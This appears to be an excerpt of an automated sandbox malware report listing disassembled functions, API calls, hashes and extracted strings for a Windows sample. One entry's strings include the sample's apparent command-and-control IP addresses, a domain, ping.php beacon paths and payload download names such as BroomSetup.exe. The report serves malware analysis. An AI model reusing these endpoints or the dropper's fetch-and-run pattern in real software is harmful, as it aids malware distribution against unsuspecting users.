                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00409967
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2005118841-0
                                                                                                                                                                                                                              • Opcode ID: 58d0a893d58f0a7d33637853af1657be7235eebdeb06fd6e02bfa0046e04e277
                                                                                                                                                                                                                              • Instruction ID: 8f33375d03ef340e879cf663a0733e21cf849d267f07301eb1b68e0c667a0042
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58d0a893d58f0a7d33637853af1657be7235eebdeb06fd6e02bfa0046e04e277
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE0923440430DB6CF007A66E8169AE772C1E04324B20497FB928B56E2EF78DD96C18E
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                              • Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                                                                                              • Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02F67A9E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1898539579.0000000002F67000.00000040.00000020.00020000.00000000.sdmp, Offset: 02F67000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2f67000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction ID: ba6311a6e1ca3f1e683a224defbcd53886e14e25d5945c075d8168f51a39b7e8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F113C79A00208EFDB01DF98C989E99BBF5EF08350F058094FA489B361D371EA90DF80
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03176823: __EH_prolog.LIBCMT ref: 03176828
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 03174D3B
                                                                                                                                                                                                                                • Part of subcall function 031762B1: __EH_prolog.LIBCMT ref: 031762B6
                                                                                                                                                                                                                                • Part of subcall function 031762B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 03176398
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                              • String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
                                                                                                                                                                                                                              • API String ID: 2531350358-3920416335
                                                                                                                                                                                                                              • Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                                                                                              • Instruction ID: 155fe2cc8e4fa4e46dc6fa4680c732f603c5f943b5d660f0be767ab9361972ec
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DA2121C40B3D0EFC652F77C58567CE2BE09B5B280F9468ADE6B45F326CB64424887DA
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 00420977
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 004209D2
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                              • String ID: ,CUSA
                                                                                                                                                                                                                              • API String ID: 745075371-2978500865
                                                                                                                                                                                                                              • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: __floor_pentium4
                                                                                                                                                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                              • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                              • Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                                                                                              • Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 00420015
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 004200A5
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 004200B3
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                              • String ID: ,CUSA
                                                                                                                                                                                                                              • API String ID: 4212172061-2978500865
                                                                                                                                                                                                                              • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 03170997
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 031709C0
                                                                                                                                                                                                                              • GetACP.KERNEL32 ref: 031709D5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction ID: c88a84a79bafb99793c76a93ed954c5a6b049afaa2e21b1f691137b590b5be66
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E21A432B40305ABFB34CF55C911BA7B3BAAB4CA64B5E84A5E94DD7100E732DA81C390
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
                                                                                                                                                                                                                              • GetACP.KERNEL32 ref: 0042076E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                                                                                              • Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FDF
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FEC
                                                                                                                                                                                                                              • GetUserDefaultLCID.KERNEL32 ref: 03170BDE
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 03170C39
                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 03170C48
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 03170C90
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 03170CAF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 745075371-0
                                                                                                                                                                                                                              • Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction ID: 8bfe97f9ee4e282fe41413a68d4a9909e242b36c54fd691736fa430764e0a445
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27516175A00319ABDF20DFA5CC48ABEB3B8AF0C708F4D4569E915EB190E7719A44CB61
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: y%B$y%B
                                                                                                                                                                                                                              • API String ID: 0-2510245575
                                                                                                                                                                                                                              • Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                                                                                              • Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 03166F80: GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _free.LIBCMT ref: 03166FB7
                                                                                                                                                                                                                                • Part of subcall function 03166F80: SetLastError.KERNEL32(00000000), ref: 03166FF8
                                                                                                                                                                                                                                • Part of subcall function 03166F80: _abort.LIBCMT ref: 03166FFE
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 0317027C
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0317030C
                                                                                                                                                                                                                              • _wcschr.LIBVCRUNTIME ref: 0317031A
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 031703BD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4212172061-0
                                                                                                                                                                                                                              • Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction ID: 98e7c4b49175539d5c87692572d705dbabbe2ec0347a02fe1d3fe0106f65bbfb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B061D476600306ABD724EBB4DC45BBAB3BCEF0C300F1D446AE949DB190EB74E95187A4
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
                                                                                                                                                                                                                                • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004203C3
                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420483
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2829624132-0
                                                                                                                                                                                                                              • Opcode ID: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                                                                                              • Instruction ID: 150eb58c917d6dfbd7f4c2a18d44eb002ac57a30d794a2eb47e087b0f294e0c3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ebeadb8fc46471ca1094bfe87f264d7eb9befaa17c0ef6b2bdfff25920991829
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D46185717001279BDB28DF25DC81BB677E8EF14344F50807AE905C6642E77CE995CB58
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 03160A9A
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 03160AA4
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 03160AB1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction ID: 088bcf44a0e09931f7bd34cc81764740796b3d0ed19959cf3fc0d6e30edb20d7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F31B27490122CDBCF21DF64DC89B99BBB8BF08310F5441EAE81CA7250E7709B958F55
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00410833
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041083D
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0041084A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3906539128-0
                                                                                                                                                                                                                              • Opcode ID: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction ID: d1fab33c372cae0273f805137467810c70e9cba24fd9c5a15224a60e011b092e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f01c3d74a580a85cb2b3a98bb34489c5dacd64fee754aa22b14778df8eb55ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E031C47490121C9BCB21EF25D9887CDB7B8BF08310F5041EAE41CA7291E7749F858F88
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000003,?,03163C24,00000003,00438DB0,0000000C,03163D7B,00000003,00000002,00000000,?,03162DD2,00000003), ref: 03163C6F
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,?,03163C24,00000003,00438DB0,0000000C,03163D7B,00000003,00000002,00000000,?,03162DD2,00000003), ref: 03163C76
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 03163C88
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1703294689-0
                                                                                                                                                                                                                              • Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction ID: f8f748f7cf30447cab06716f2a0e96718b6dc4c31134b847042ca10b7e61d906
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40E0BF35600609ABCF12AF94DD0CA693F79EB48285F444425FD564A131CB35DE62CA44
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                              • API String ID: 0-2784972518
                                                                                                                                                                                                                              • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                              • Instruction ID: 0053dc82725b70ebe74e57aa7fad2cec671fd03b365222813dbdf76fa64f86a7
